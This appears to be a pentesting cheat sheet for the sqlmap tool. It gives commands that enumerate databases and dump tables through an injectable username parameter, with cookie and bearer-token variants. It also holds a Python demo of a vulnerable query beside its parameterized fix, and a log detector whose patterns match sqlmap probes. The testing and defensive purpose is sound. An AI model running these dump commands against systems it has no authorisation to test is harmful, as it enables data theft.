SQL injection tool – sqlmap


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. More here: http://sqlmap.org/

Installation

apt-get install -y sqlmap

Docker image with pre-installed tool

– https://hub.docker.com/r/szalek/pentest-tools/

docker pull szalek/pentest-tools
docker run -it szalek/pentest-tools

Target

– http://target.localhost/rest/ws-user-account.php?username=szalek
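The endpoint above takes a username query parameter and, for sqlmap to find anything, must paste that value into SQL text. As an added example (not the page's or any real application's code), here is a Python stand-in with the same injectable pattern next to its parameterized fix; the users table, its two rows and the sqlite3 back end are assumptions. A single quote in the input is the first thing sqlmap's detection engine tries: the vulnerable version turns it into a database error, the fixed version treats it as plain data.

```python
import sqlite3

# Constructed in-memory stand-in for the database behind ws-user-account.php
# (hypothetical schema and rows; not the page's or any real application's code).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("szalek", "szalek@example.test"),
                      ("alice", "alice@example.test")])
    conn.commit()
    return conn

def lookup_vulnerable(conn, username):
    # The injectable pattern: user input is pasted straight into the SQL text,
    # so a quote in the input changes the structure of the statement.
    query = "SELECT username, email FROM users WHERE username = '%s'" % username
    return conn.execute(query).fetchall()

def lookup_safe(conn, username):
    # Parameterized query: the driver sends the value separately from the SQL
    # text, so quotes and keywords inside `username` are just data.
    query = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()

def probe(conn, lookup, username):
    """Run one lookup and report what a scanner would observe: either the
    rows returned, or the database error text that a quote in the input triggers."""
    try:
        return {"rows": lookup(conn, username), "error": None}
    except sqlite3.Error as exc:
        return {"rows": None, "error": str(exc)}

if __name__ == "__main__":
    conn = make_db()
    # "szalek'" is the quote probe: an error here is what marks the parameter injectable.
    for name in ("szalek", "szalek'"):
        print("vulnerable", repr(name), probe(conn, lookup_vulnerable, name))
        print("safe      ", repr(name), probe(conn, lookup_safe, name))
```

Run it to see both lookups side by side; the parameterized query is the mitigation that makes every enumeration command on this page come back empty, because sqlmap never gets a way to alter the statement.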

Sqlmap basic

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --dbs
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -D {DB_NAME} --tables
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE_NAME} --columns
sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" -T {TABLE_NAME} --dump

with cookie

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --cookie "JSESSIONID=C59D9452BBE59FC357A1D0E62E8646A4" --dbs

with header

sqlmap -u "http://target.localhost/rest/ws-user-account.php?username=szalek" --headers="Authorization: Bearer fyJhabcGiOJI..." --dbs
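From the defender's side, each of the commands above leaves a trace in the web server's access log. As an added example (not sqlmap's own code), the following Python parses a few constructed Apache combined-format lines for the same endpoint and scores each request on three signals: sqlmap's default User-Agent, SQL keywords or comment sequences in a URL-decoded parameter, and a 5xx response to a request carrying a quote (the error-based probe). The sample lines, the weights and the threshold are assumptions; a lone apostrophe such as o'brien stays below the threshold so ordinary names do not raise an alert on their own.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache "combined" format (not real traffic).
# Line 2 is a quote probe with sqlmap's default agent, line 3 a timing probe
# behind a browser-looking agent, line 4 a legitimate name with an apostrophe.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2024:10:00:01 +0000] "GET /rest/ws-user-account.php?username=szalek HTTP/1.1" 200 143 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Mar/2024:10:00:07 +0000] "GET /rest/ws-user-account.php?username=szalek%27 HTTP/1.1" 500 0 "-" "sqlmap/1.7.2#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Mar/2024:10:00:08 +0000] "GET /rest/ws-user-account.php?username=szalek%20AND%20SLEEP(5) HTTP/1.1" 200 143 "-" "Mozilla/5.0 (compatible)"
10.0.0.7 - - [01/Mar/2024:10:00:09 +0000] "GET /rest/ws-user-account.php?username=o%27brien HTTP/1.1" 200 143 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# (rule name, pattern, field it applies to, weight). Weights are assumptions,
# chosen so that a single quote alone does not cross the threshold.
RULES = [
    ("sqlmap user-agent", re.compile(r"sqlmap", re.I), "ua", 10),
    ("sql keyword in parameter", re.compile(r"\b(union|select|sleep|benchmark|waitfor)\b", re.I), "param", 5),
    ("comment/terminator in parameter", re.compile(r"(--|/\*|;)"), "param", 4),
    ("quote in parameter", re.compile(r"['\"]"), "param", 1),
]
THRESHOLD = 4

def score_request(rec):
    """Score one parsed request; returns (score, list of rule names that fired)."""
    # parse_qsl URL-decodes the values, so %27 is inspected as a real quote.
    params = dict(parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True))
    param_text = " ".join(params.values())
    hits, score = [], 0
    for name, pattern, field, weight in RULES:
        haystack = rec["ua"] if field == "ua" else param_text
        if pattern.search(haystack):
            hits.append(name)
            score += weight
    # A server error on a request with a suspicious parameter is the classic
    # error-based injection signature, so a 5xx adds weight on its own.
    if int(rec["status"]) >= 500:
        hits.append("server error")
        score += 3
    return score, hits

def detect(log_text):
    """Return one alert dict per line whose score reaches THRESHOLD."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        rec = m.groupdict()
        score, hits = score_request(rec)
        if score >= THRESHOLD:
            alerts.append({"ip": rec["ip"], "ts": rec["ts"],
                           "target": rec["target"], "score": score, "hits": hits})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The User-Agent rule alone is weak, since sqlmap can be told to present a random browser agent (--random-agent), which is why the score also leans on the decoded parameter contents and on the response status; in practice the parameter and status rules are what catch the probes that hide their agent.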